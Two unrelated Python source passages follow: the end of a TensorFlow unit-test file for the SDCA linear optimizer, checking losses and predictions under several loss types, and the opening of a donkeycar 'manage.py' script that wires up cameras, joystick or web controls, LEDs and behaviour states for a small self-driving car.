examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
variables_lib.Variable(array_ops.zeros(
[1], dtype=dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
class SdcaWithLinearLossTest(SdcaModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose(
[-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose(
[optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4.0, 48/5 due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
# regularization and example weights, the predictions are within:
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
self.assertAllClose(
[-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
class SdcaWithHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
# loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
class SdcaWithSmoothHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
class SdcaFprintTest(SdcaModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we are checking against exact values and this test could be running
across different platforms. Note that it is fine for expected values to change
in the future, if the implementation of SdcaFprint changes (ie this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
out_data = gen_sdca_ops.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
out_data.eval())
if __name__ == '__main__':
googletest.main()
|
manage.py
|
#!/usr/bin/env python3
"""
Scripts to drive a donkey 2 car
Usage:
manage.py (drive) [--model=<model>] [--js] [--type=(linear|categorical)] [--camera=(single|stereo)] [--meta=<key:value> ...] [--myconfig=<filename>]
manage.py (train) [--tubs=tubs] (--model=<model>) [--type=(linear|inferred|tensorrt_linear|tflite_linear)]
Options:
-h --help Show this screen.
--js Use physical joystick.
-f --file=<file> A text file containing paths to tub files, one per line. Option may be used more than once.
--meta=<key:value> Key/Value strings describing describing a piece of meta data about this drive. Option may be used more than once.
--myconfig=filename Specify myconfig file to use.
[default: myconfig.py]
"""
import os
import time
import logging
from docopt import docopt
import numpy as np
import donkeycar as dk
from donkeycar.parts.transform import TriggeredCallback, DelayedTrigger
from donkeycar.parts.tub_v2 import TubWriter
from donkeycar.parts.datastore import TubHandler
from donkeycar.parts.controller import LocalWebController, JoystickController, WebFpv
from donkeycar.parts.throttle_filter import ThrottleFilter
from donkeycar.parts.behavior import BehaviorPart
from donkeycar.parts.file_watcher import FileWatcher
from donkeycar.parts.launch import AiLaunch
from donkeycar.utils import *
from donkeypart_sombrero import Sombrero as Smbrero
logger = logging.getLogger()
def drive(cfg, model_path=None, use_joystick=False, model_type=None, camera_type='single', meta=[]):
'''
Construct a working robotic vehicle from many parts.
Each part runs as a job in the Vehicle loop, calling either
it's run or run_threaded method depending on the constructor flag `threaded`.
All parts are updated one after another at the framerate given in
cfg.DRIVE_LOOP_HZ assuming each part finishes processing in a timely manner.
Parts may have named outputs and inputs. The framework handles passing named outputs
to parts requesting the same named input.
'''
if cfg.DONKEY_GYM:
#the simulator will use cuda and then we usually run out of resources
#if we also try to use cuda. so disable for donkey_gym.
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
if model_type is None:
if cfg.TRAIN_LOCALIZER:
model_type = "localizer"
elif cfg.TRAIN_BEHAVIORS:
model_type = "behavior"
else:
model_type = cfg.DEFAULT_MODEL_TYPE
#Initialize car
V = dk.vehicle.Vehicle()
# sombrero = Smbrero(
# steering_channel=cfg.STEERING_CHANNEL,
# steering_left_pwm=cfg.STEERING_LEFT_PWM,
# steering_right_pwm=cfg.STEERING_RIGHT_PWM,
# throttle_channel=cfg.THROTTLE_CHANNEL,
# throttle_forward_pwm=cfg.THROTTLE_FORWARD_PWM,
# throttle_stop_pwm=cfg.THROTTLE_STOPPED_PWM,
# throttle_reverse_pwm=cfg.THROTTLE_REVERSE_PWM
# )
# V.add(sombrero, inputs=['angle', 'throttle'])
#Initialize logging before anything else to allow console logging
if cfg.HAVE_CONSOLE_LOGGING:
logger.setLevel(logging.getLevelName(cfg.LOGGING_LEVEL))
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter(cfg.LOGGING_FORMAT))
logger.addHandler(ch)
logger.info("cfg.CAMERA_TYPE %s"%cfg.CAMERA_TYPE)
if camera_type == "stereo":
if cfg.CAMERA_TYPE == "WEBCAM":
from donkeycar.parts.camera import Webcam
camA = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 0)
camB = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 1)
elif cfg.CAMERA_TYPE == "CVCAM":
from donkeycar.parts.cv import CvCam
camA = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 0)
camB = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 1)
else:
raise(Exception("Unsupported camera type: %s" % cfg.CAMERA_TYPE))
V.add(camA, outputs=['cam/image_array_a'], threaded=True)
V.add(camB, outputs=['cam/image_array_b'], threaded=True)
from donkeycar.parts.image import StereoPair
V.add(StereoPair(), inputs=['cam/image_array_a', 'cam/image_array_b'],
outputs=['cam/image_array'])
elif cfg.CAMERA_TYPE == "D435":
from donkeycar.parts.realsense435i import RealSense435i
cam = RealSense435i(
enable_rgb=cfg.REALSENSE_D435_RGB,
enable_depth=cfg.REALSENSE_D435_DEPTH,
enable_imu=cfg.REALSENSE_D435_IMU,
device_id=cfg.REALSENSE_D435_ID)
V.add(cam, inputs=[],
outputs=['cam/image_array', 'cam/depth_array',
'imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z'],
threaded=True)
else:
if cfg.DONKEY_GYM:
from donkeycar.parts.dgym import DonkeyGymEnv
inputs = []
threaded = True
if cfg.DONKEY_GYM:
from donkeycar.parts.dgym import DonkeyGymEnv
cam = DonkeyGymEnv(cfg.DONKEY_SIM_PATH, host=cfg.SIM_HOST, env_name=cfg.DONKEY_GYM_ENV_NAME, conf=cfg.GYM_CONF, delay=cfg.SIM_ARTIFICIAL_LATENCY)
threaded = True
inputs = ['angle', 'throttle']
elif cfg.CAMERA_TYPE == "PICAM":
from donkeycar.parts.camera import PiCamera
cam = PiCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE, vflip=cfg.CAMERA_VFLIP, hflip=cfg.CAMERA_HFLIP)
elif cfg.CAMERA_TYPE == "WEBCAM":
from donkeycar.parts.camera import Webcam
cam = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "CVCAM":
from donkeycar.parts.cv import CvCam
cam = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "CSIC":
from donkeycar.parts.camera import CSICamera
cam = CSICamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE, gstreamer_flip=cfg.CSIC_CAM_GSTREAMER_FLIP_PARM)
elif cfg.CAMERA_TYPE == "V4L":
from donkeycar.parts.camera import V4LCamera
cam = V4LCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, framerate=cfg.CAMERA_FRAMERATE)
elif cfg.CAMERA_TYPE == "MOCK":
from donkeycar.parts.camera import MockCamera
cam = MockCamera(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH)
elif cfg.CAMERA_TYPE == "IMAGE_LIST":
from donkeycar.parts.camera import ImageListCamera
cam = ImageListCamera(path_mask=cfg.PATH_MASK)
elif cfg.CAMERA_TYPE == "LEOPARD":
from donkeycar.parts.leopard_imaging import LICamera
cam = LICamera(width=cfg.IMAGE_W, height=cfg.IMAGE_H, fps=cfg.CAMERA_FRAMERATE)
else:
raise(Exception("Unkown camera type: %s" % cfg.CAMERA_TYPE))
V.add(cam, inputs=inputs, outputs=['cam/image_array'], threaded=threaded)
if use_joystick or cfg.USE_JOYSTICK_AS_DEFAULT:
#modify max_throttle closer to 1.0 to have more power
#modify steering_scale lower than 1.0 to have less responsive steering
if cfg.CONTROLLER_TYPE == "MM1":
from donkeycar.parts.robohat import RoboHATController
ctr = RoboHATController(cfg)
elif "custom" == cfg.CONTROLLER_TYPE:
#
# custom controller created with `donkey createjs` command
#
from my_joystick import MyJoystickController
ctr = MyJoystickController(
throttle_dir=cfg.JOYSTICK_THROTTLE_DIR,
throttle_scale=cfg.JOYSTICK_MAX_THROTTLE,
steering_scale=cfg.JOYSTICK_STEERING_SCALE,
auto_record_on_throttle=cfg.AUTO_RECORD_ON_THROTTLE)
ctr.set_deadzone(cfg.JOYSTICK_DEADZONE)
else:
from donkeycar.parts.controller import get_js_controller
ctr = get_js_controller(cfg)
if cfg.USE_NETWORKED_JS:
from donkeycar.parts.controller import JoyStickSub
netwkJs = JoyStickSub(cfg.NETWORK_JS_SERVER_IP)
V.add(netwkJs, threaded=True)
ctr.js = netwkJs
V.add(ctr,
inputs=['cam/image_array'],
outputs=['user/angle', 'user/throttle', 'user/mode', 'recording'],
threaded=True)
else:
#This web controller will create a web server that is capable
#of managing steering, throttle, and modes, and more.
ctr = LocalWebController(port=cfg.WEB_CONTROL_PORT, mode=cfg.WEB_INIT_MODE)
V.add(ctr,
inputs=['cam/image_array', 'tub/num_records'],
outputs=['user/angle', 'user/throttle', 'user/mode', 'recording'],
threaded=True)
#this throttle filter will allow one tap back for esc reverse
th_filter = ThrottleFilter()
V.add(th_filter, inputs=['user/throttle'], outputs=['user/throttle'])
#See if we should even run the pilot module.
#This is only needed because the part run_condition only accepts boolean
class PilotCondition:
def run(self, mode):
if mode == 'user':
return False
else:
return True
V.add(PilotCondition(), inputs=['user/mode'], outputs=['run_pilot'])
class LedConditionLogic:
def __init__(self, cfg):
self.cfg = cfg
def run(self, mode, recording, recording_alert, behavior_state, model_file_changed, track_loc):
#returns a blink rate. 0 for off. -1 for on. positive for rate.
if track_loc is not None:
led.set_rgb(*self.cfg.LOC_COLORS[track_loc])
return -1
if model_file_changed:
led.set_rgb(self.cfg.MODEL_RELOADED_LED_R, self.cfg.MODEL_RELOADED_LED_G, self.cfg.MODEL_RELOADED_LED_B)
return 0.1
else:
led.set_rgb(self.cfg.LED_R, self.cfg.LED_G, self.cfg.LED_B)
if recording_alert:
led.set_rgb(*recording_alert)
return self.cfg.REC_COUNT_ALERT_BLINK_RATE
else:
led.set_rgb(self.cfg.LED_R, self.cfg.LED_G, self.cfg.LED_B)
if behavior_state is not None and model_type == 'behavior':
r, g, b = self.cfg.BEHAVIOR_LED_COLORS[behavior_state]
led.set_rgb(r, g, b)
return -1 #solid on
if recording:
return -1 #solid on
elif mode == 'user':
return 1
elif mode == 'local_angle':
return 0.5
elif mode == 'local':
return 0.1
return 0
if cfg.HAVE_RGB_LED and not cfg.DONKEY_GYM:
from donkeycar.parts.led_status import RGB_LED
led = RGB_LED(cfg.LED_PIN_R, cfg.LED_PIN_G, cfg.LED_PIN_B, cfg.LED_INVERT)
led.set_rgb(cfg.LED_R, cfg.LED_G, cfg.LED_B)
V.add(LedConditionLogic(cfg), inputs=['user/mode', 'recording', "records/alert", 'behavior/state', 'modelfile/modified', "pilot/loc"],
outputs=['led/blink_rate'])
V.add(led, inputs=['led/blink_rate'])
def get_record_alert_color(num_records):
col = (0, 0, 0)
for count, color in cfg.RECORD_ALERT_COLOR_ARR:
if num_records >= count:
col = color
return col
class RecordTracker:
def __init__(self):
self.last_num_rec_print = 0
self.dur_alert = 0
self.force_alert = 0
def run(self, num_records):
if num_records is None:
return 0
if self.last_num_rec_print != num_records or self.force_alert:
self.last_num_rec_print = num_records
if num_records % 10 == 0:
print("recorded", num_records, "records")
if num_records % cfg.REC_COUNT_ALERT == 0 or self.force_alert:
self.dur_alert = num_records // cfg.REC_COUNT_ALERT * cfg.REC_COUNT_ALERT_CYC
self.force_alert = 0
if self.dur_alert > 0:
self.dur_alert -= 1
if self.dur_alert != 0:
return get_record_alert_color(num_records)
return 0
rec_tracker_part = RecordTracker()
V.add(rec_tracker_part, inputs=["tub/num_records"], outputs=['records/alert'])
if cfg.AUTO_RECORD_ON_THROTTLE and isinstance(ctr, JoystickController):
#then we are not using the circle button. hijack that to force a record count indication
def show_record_acount_status():
rec_tracker_part.last_num_rec_print = 0
rec_tracker_part.force_alert = 1
ctr.set_button_down_trigger('circle', show_record_acount_status)
#Sombrero
if cfg.HAVE_SOMBRERO:
from donkeycar.parts.sombrero import Sombrero
s = Sombrero()
#IMU
if cfg.HAVE_IMU:
from donkeycar.parts.imu import IMU
imu = IMU(sensor=cfg.IMU_SENSOR, dlp_setting=cfg.IMU_DLP_CONFIG)
V.add(imu, outputs=['imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z'], threaded=True)
# Use the FPV preview, which will show the cropped image output, or the full frame.
if cfg.USE_FPV:
V.add(WebFpv(), inputs=['cam/image_array'], threaded=True)
import threading
import functools
mutex=threading.Lock()
class proxy:
def __init__( self ):
self.myvar = False
def get( self ):
tmp = False
mutex.acquire()
tmp = self.myvar
mutex.release()
return tmp
def set( self, newValue ):
mutex.acquire()
self.myvar = newValue
mutex.release()
class FloatProxy:
def __init__( self ):
self.myvar = 0
def get( self ):
tmp = False
mutex.acquire()
tmp = self.myvar
mutex.release()
return tmp
def set( self, newValue ):
mutex.acquire()
self.myvar = newValue
mutex.release()
isEvent=proxy()
timer=FloatProxy()
class Delayed(object):
def __init__(self, delay):
self.delay = delay
def __call__(self, func):
waiter = threading.Event()
@functools.wraps(func)
def wrapper(*args, **kwargs):
def _run():
waiter.wait(self.delay)
func(*args, **kwargs)
t = threading.Thread(target=_run)
t.start()
return wrapper
# flag=False
@Delayed(0.25)
def defaultState(bh,isEvent):
if(timer.get()>0):
timer.set(timer.get()-1)
defaultState(bh,isEvent)
return
bh.set_state(1)
# bh.set_state(3)
isEvent.set(False)
def setStateLeft(x,bh,isEvent):
if(not isEvent.get()):
isEvent.set(True)
bh.set_state(x)
defaultState(bh,isEvent)
else:
timer.set(timer.get()+1)
# ctr.set_axis_trigger("dpad_up_down",ctr.set_throttle)
#Behavioral state
if cfg.TRAIN_BEHAVIORS:
bh = BehaviorPart(cfg.BEHAVIOR_LIST)
V.add(bh, outputs=['behavior/state', 'behavior/label', "behavior/one_hot_state_array"])
# bh.set_state(3)
bh.set_state(1)
try:
ctr.set_button_down_trigger('L1', lambda X=0:setStateLeft(X,bh,isEvent))
ctr.set_button_down_trigger('R1', lambda X=2:setStateLeft(X,bh,isEvent))
# ctr.set_button_down_trigger('X', lambda X=1:setStateLeft(X,bh,isEvent))
except:
pass
inputs = ['cam/image_array', "behavior/one_hot_state_array"]
#IMU
elif model_type == "imu":
